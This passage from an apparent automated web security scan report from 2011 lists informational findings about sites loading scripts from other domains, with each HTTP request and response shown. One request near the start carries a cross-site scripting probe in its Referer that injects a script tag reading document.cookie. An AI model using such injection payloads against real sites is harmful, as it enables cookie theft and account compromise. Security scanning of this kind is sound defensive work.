Host: financaspessoais.blog.br
Proxy-Connection: keep-alive
Referer: http://financaspessoais.blog.br/?f8184%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec42c81b1212=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239951252.1295480312.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/51; __utma=239951252.1616361418.1295480312.1295480312.1295480312.1; __utmc=239951252; __utmb=239951252.1.10.1295480312

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 23:37:40 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 19 Jan 2011 23:37:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 186507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</script><script type="text/javascript" id="topsy-js-elem" src="http://cdn.topsy.com/topsy.js?init=topsyWidgetCreator"></script>
...[SNIP]...

16.4. http://flowplayer.org/tools/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://flowplayer.org
Path:   /tools/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tools/ HTTP/1.1
Host: flowplayer.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 19 Jan 2011 15:23:41 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 13114


   <!DOCTYPE html>
   

<!--
   Flowplayer JavaScript, website, forums & jQuery Tools by Tero Piirainen
   
   Prefer web standards over Flash. Video is the only exception (f
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/global-0.52.css?foo" />    


                           <script src="http://cdn.jquerytools.org/1.2.5/full/jquery.tools.min.js?foo"></script>
...[SNIP]...

16.5. http://gc.blog.br/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gc.blog.br
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: gc.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:08:11 GMT
Server: Apache/2.2.10 (CentOS)
X-Pingback: http://gc.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<p><script src="http://widgets.twimg.com/j/1/widget.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://www.google.com/reader/ui/publisher-en.js"></script>
<script type="text/javascript" src="http://www.google.com/reader/public/javascript/user/13324626892444451583/state/com.google/broadcast?n=10&callback=GRC_p(%7Bc%3A%22blue%22%2Ct%3A%22%22%2Cs%3A%22false%22%2Cb%3A%22false%22%7D)%3Bnew%20GRC"></script>
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<!-- Gorgeous design by Michael Heilemann - http://binarybonsai.com/kubrick/ -->

       <script src="http://stats.wordpress.com/e-201103.js" type="text/javascript"></script>
...[SNIP]...

16.6. http://landesm.gfi.com/event-log-analysis-sm/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landesm.gfi.com
Path:   /event-log-analysis-sm/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /event-log-analysis-sm/ HTTP/1.1
Host: landesm.gfi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 19 Jan 2011 18:09:09 GMT
Etag: "6e2f3ed9101a167ccc2f760d7ec44f1e01b39cc9"
Server: TornadoServer/1.0
Set-Cookie: __ptcx=7uXan4.9hp3Sx.1; expires=Mon, 18 Jul 2011 18:09:09 GMT; Path=/
Set-Cookie: __pcid=7uXan4:1; Domain=.gfi.com; expires=Mon, 18 Jul 2011 18:09:09 GMT; Path=/
Content-Length: 30166
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Event log analysis &amp; management</title>

...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.gfi.com/landing/styles/styles13.css">
<script language="JavaScript" type="text/javascript" src="http://cdn.performable.com/catalog/3303.0/assets/js/q7CSP-landing.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

16.7. https://login.yahoo.com/config/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /config/login?.src=fpctx&logout=1&r= HTTP/1.1
Host: login.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:21 GMT
Set-Cookie: B=76otfft6jea6h&b=3&s=5d; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com
Set-Cookie: Y=%2e; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com
Set-Cookie: T=z=0; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; domain=.yahoo.com
Set-Cookie: SSL=%2e; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; domain=.yahoo.com; secure
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 18382


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8
...[SNIP]...
</script><script src="https://a248.e.akamai.net/sec.yimg.com/a/1-/jscodes/flash8/yad_20071204.js"></script>
...[SNIP]...

16.8. https://login.yahoo.com/config/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /config/login HTTP/1.1
Host: login.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:20 GMT
Set-Cookie: B=5u97cop6jea6g&b=3&s=jo; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 41558


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
</script>
<script type="text/javascript" src="https://s.yimg.com/lq/lib/reg/js/yahoo_dom_event_animation_connection_2.8.2_inc_superads_capslock_loginmd5_min_12.js"></script>
...[SNIP]...

16.9. http://medienfreunde.com/lab/innerfade/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://medienfreunde.com
Path:   /lab/innerfade/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /lab/innerfade/ HTTP/1.1
Host: medienfreunde.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 14265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<!-- saved from url=(0013)about:internet -->
   <hea
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                   </script>
...[SNIP]...
</script>
                   <script type="text/javascript"
                    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                   </script>
...[SNIP]...
</script>
   <script type="text/javascript"
    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

   </script>
...[SNIP]...
</script>
   <script type="text/javascript"
    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

   </script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                   </script>
...[SNIP]...

16.10. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /magazines/fortune/bestcompanies/2010/snapshots/65.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /magazines/fortune/bestcompanies/2010/snapshots/65.html HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:25:12 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=60, private
Expires: Wed, 19 Jan 2011 15:26:12 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 75163

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>100 Best Companies to Work For 2010: Arnold & Porter - from FORTUNE</title>
<meta HTTP-EQUIV="Pragma" CONTENT="no-c
...[SNIP]...
</script>
<script type="text/javascript" src="http://i.cdn.turner.com/money/fn_adspaces/cnn_adspaces.js"></script>
...[SNIP]...
</script>
<script language="JavaScript1.1" src="http://i.cdn.turner.com/money/.element/ssi/javascript/1.0/main.js" type="text/javascript"></script>
<script language="JavaScript1.1" src="http://i.cdn.turner.com/money/.element/ssi/javascript/1.0/bc_page.js" type="text/javascript"></script>
<script language="JavaScript1.1" src="http://i.cdn.turner.com/money/.element/ssi/javascript/2.0/fortune500_2008.js" type="text/javascript"></script>
...[SNIP]...
</div>
   <script language="JavaScript" src="http://i.cdn.turner.com/money/.element/ssi/javascript/1.1/cnnhat_section.js"></script>
   <div id="header">
       <script language="JavaScript" src="http://i.cdn.turner.com/money/.element/ssi/javascript/1.0/search_form.js" type="text/javascript"></script>
...[SNIP]...
</style>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>
   <script language="JavaScript" src="http://i.cdn.turner.com/money/.element/ssi/navigation/2.0/nav_fortune.js"></script>
...[SNIP]...
<![endif]-->
       <script type="text/javascript" src="http://i.cdn.turner.com/money/.element/script/3.0/services/connect-lite.js"></script>
...[SNIP]...
<!-- end footer -->
<script language="JavaScript" src="http://i.cdn.turner.com/money/.element/script/4.0/omniture/jsmd.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" name="cleanprintloader" src="http://cache-01.cleanprint.net/cp/ccg?divId=2435"></script>
...[SNIP]...
<!-- Start Quantcast Measurement tag -->
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
   <script src="http://js.revsci.net/gateway/gw.js?csid=H07710"></script>
...[SNIP]...

16.11. http://rafael.adm.br/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rafael.adm.br
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: rafael.adm.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 19 Jan 2011 16:58:37 GMT
Content-Type: text/html
Content-Length: 42798
Last-Modified: Wed, 19 Jan 2011 15:12:07 GMT
Connection: close
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<span class="noborder"><script type="text/javascript" language="javascript" src="http://twittercounter.com/embed/?username=rafaelp"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=cYiTaGq0mr37xaadbiUzgI&s=160...=pb"></script>
...[SNIP]...
</script>
<script src="http://cdn.wibiya.com/Toolbars/dir_0009/Toolbar_9298/Loader_9298.js" type="text/javascript"></script>
<script type="text/javascript" id="navegg" src="http://lt.navegg.com/lt.js?12596"></script>
...[SNIP]...

16.12. http://rafael.adm.br/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rafael.adm.br
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
Host: rafael.adm.br
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=140391216.1295459905.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/38; __utma=140391216.1990621908.1295459905.1295459905.1295459905.1; __utmc=140391216; __utmb=140391216.1.10.1295459905; nvgpfl=547362597; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Wed, 19 Jan 2011 17:57:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
Vary: Accept-Encoding, Cookie
X-Pingback: http://rafael.adm.br/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 19 Jan 2011 17:57:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 22967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<span class="noborder"><script type="text/javascript" language="javascript" src="http://twittercounter.com/embed/?username=rafaelp"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=cYiTaGq0mr37xaadbiUzgI&s=160...=pb"></script>
...[SNIP]...
</script>
<script src="http://cdn.wibiya.com/Toolbars/dir_0009/Toolbar_9298/Loader_9298.js" type="text/javascript"></script>
<script type="text/javascript" id="navegg" src="http://lt.navegg.com/lt.js?12596"></script>
...[SNIP]...

16.13. http://rafael.adm.br/feed/podcast/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rafael.adm.br
Path:   /feed/podcast/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /feed/podcast/ HTTP/1.1
Host: rafael.adm.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=140391216.1295459905.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/38; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=140391216.1990621908.1295459905.1295459905.1295459905.1; nvgpfl=547362597; __utmc=140391216; __utmb=140391216.5.9.1295459945750;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Wed, 19 Jan 2011 18:13:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.10-2ubuntu6
Vary: Cookie
X-Pingback: http://rafael.adm.br/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 19 Jan 2011 18:13:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 22967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<span class="noborder"><script type="text/javascript" language="javascript" src="http://twittercounter.com/embed/?username=rafaelp"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=cYiTaGq0mr37xaadbiUzgI&s=160...=pb"></script>
...[SNIP]...
</script>
<script src="http://cdn.wibiya.com/Toolbars/dir_0009/Toolbar_9298/Loader_9298.js" type="text/javascript"></script>
<script type="text/javascript" id="navegg" src="http://lt.navegg.com/lt.js?12596"></script>
...[SNIP]...

16.14. http://rafael.adm.br/p/bootstrapping-de-aplicacoes-web-no-ceara-on-rails-2009/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rafael.adm.br
Path:   /p/bootstrapping-de-aplicacoes-web-no-ceara-on-rails-2009/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /p/bootstrapping-de-aplicacoes-web-no-ceara-on-rails-2009/ HTTP/1.1
Host: rafael.adm.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=140391216.1295459905.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/38; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=140391216.1990621908.1295459905.1295459905.1295459905.1; nvgpfl=547362597; __utmc=140391216; __utmb=140391216.5.9.1295459945750;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 19 Jan 2011 18:13:28 GMT
Content-Type: text/html
Content-Length: 36945
Last-Modified: Wed, 19 Jan 2011 18:05:18 GMT
Connection: close
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<span class="noborder"><script type="text/javascript" language="javascript" src="http://twittercounter.com/embed/?username=rafaelp"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=cYiTaGq0mr37xaadbiUzgI&s=160...=pb"></script>
...[SNIP]...
</script>
<script src="http://cdn.wibiya.com/Toolbars/dir_0009/Toolbar_9298/Loader_9298.js" type="text/javascript"></script>
<script type="text/javascript" id="navegg" src="http://lt.navegg.com/lt.js?12596"></script>
...[SNIP]...

16.15. http://rafael.adm.br/p/definicao-de-metas-e-prioridades/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rafael.adm.br
Path:   /p/definicao-de-metas-e-prioridades/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /p/definicao-de-metas-e-prioridades/ HTTP/1.1
Host: rafael.adm.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=140391216.1295459905.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/38; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=140391216.1990621908.1295459905.1295459905.1295459905.1; nvgpfl=547362597; __utmc=140391216; __utmb=140391216.5.9.1295459945750;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 19 Jan 2011 18:13:27 GMT
Content-Type: text/html
Content-Length: 28168
Last-Modified: Wed, 19 Jan 2011 18:05:15 GMT
Connection: close
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<span class="noborder"><script type="text/javascript" language="javascript" src="http://twittercounter.com/embed/?username=rafaelp"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=cYiTaGq0mr37xaadbiUzgI&s=160...=pb"></script>
...[SNIP]...
</script>
<script src="http://cdn.wibiya.com/Toolbars/dir_0009/Toolbar_9298/Loader_9298.js" type="text/javascript"></script>
<script type="text/javascript" id="navegg" src="http://lt.navegg.com/lt.js?12596"></script>
...[SNIP]...

16.16. http://rafael.adm.br/p/empretec-eu-fiz/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rafael.adm.br
Path:   /p/empretec-eu-fiz/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /p/empretec-eu-fiz/ HTTP/1.1
Host: rafael.adm.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=140391216.1295459905.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/38; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=140391216.1990621908.1295459905.1295459905.1295459905.1; nvgpfl=547362597; __utmc=140391216; __utmb=140391216.5.9.1295459945750;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 19 Jan 2011 18:13:31 GMT
Content-Type: text/html
Content-Length: 48875
Last-Modified: Wed, 19 Jan 2011 18:05:19 GMT
Connection: close
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<span class="noborder"><script type="text/javascript" language="javascript" src="http://twittercounter.com/embed/?username=rafaelp"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=cYiTaGq0mr37xaadbiUzgI&s=160...=pb"></script>
...[SNIP]...
</script>
<script src="http://cdn.wibiya.com/Toolbars/dir_0009/Toolbar_9298/Loader_9298.js" type="text/javascript"></script>
<script type="text/javascript" id="navegg" src="http://lt.navegg.com/lt.js?12596"></script>
...[SNIP]...

16.17. http://rafael.adm.br/p/galera-no-edted/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rafael.adm.br
Path:   /p/galera-no-edted/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /p/galera-no-edted/ HTTP/1.1
Host: rafael.adm.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=140391216.1295459905.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/38; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=140391216.1990621908.1295459905.1295459905.1295459905.1; nvgpfl=547362597; __utmc=140391216; __utmb=140391216.5.9.1295459945750;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 19 Jan 2011 18:13:24 GMT
Content-Type: text/html
Content-Length: 33420
Last-Modified: Wed, 19 Jan 2011 18:05:12 GMT
Connection: close
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<span class="noborder"><script type="text/javascript" language="javascript" src="http://twittercounter.com/embed/?username=rafaelp"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=cYiTaGq0mr37xaadbiUzgI&s=160...=pb"></script>
...[SNIP]...
</script>
<script src="http://cdn.wibiya.com/Toolbars/dir_0009/Toolbar_9298/Loader_9298.js" type="text/javascript"></script>
<script type="text/javascript" id="navegg" src="http://lt.navegg.com/lt.js?12596"></script>
...[SNIP]...

16.18. http://rafael.adm.br/p/oxente-rails-2010/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rafael.adm.br
Path:   /p/oxente-rails-2010/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /p/oxente-rails-2010/ HTTP/1.1
Host: rafael.adm.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=140391216.1295459905.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/38; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=140391216.1990621908.1295459905.1295459905.1295459905.1; nvgpfl=547362597; __utmc=140391216; __utmb=140391216.5.9.1295459945750;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 19 Jan 2011 18:13:23 GMT
Content-Type: text/html
Content-Length: 35936
Last-Modified: Wed, 19 Jan 2011 18:05:10 GMT
Connection: close
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...
<span class="noborder"><script type="text/javascript" language="javascript" src="http://twittercounter.com/embed/?username=rafaelp"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=cYiTaGq0mr37xaadbiUzgI&s=160...=pb"></script>
...[SNIP]...
</script>
<script src="http://cdn.wibiya.com/Toolbars/dir_0009/Toolbar_9298/Loader_9298.js" type="text/javascript"></script>
<script type="text/javascript" id="navegg" src="http://lt.navegg.com/lt.js?12596"></script>
...[SNIP]...

16.19. http://rafael.adm.br/p/programador-lento/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rafael.adm.br
Path:   /p/programador-lento/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /p/programador-lento/ HTTP/1.1
Host: rafael.adm.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
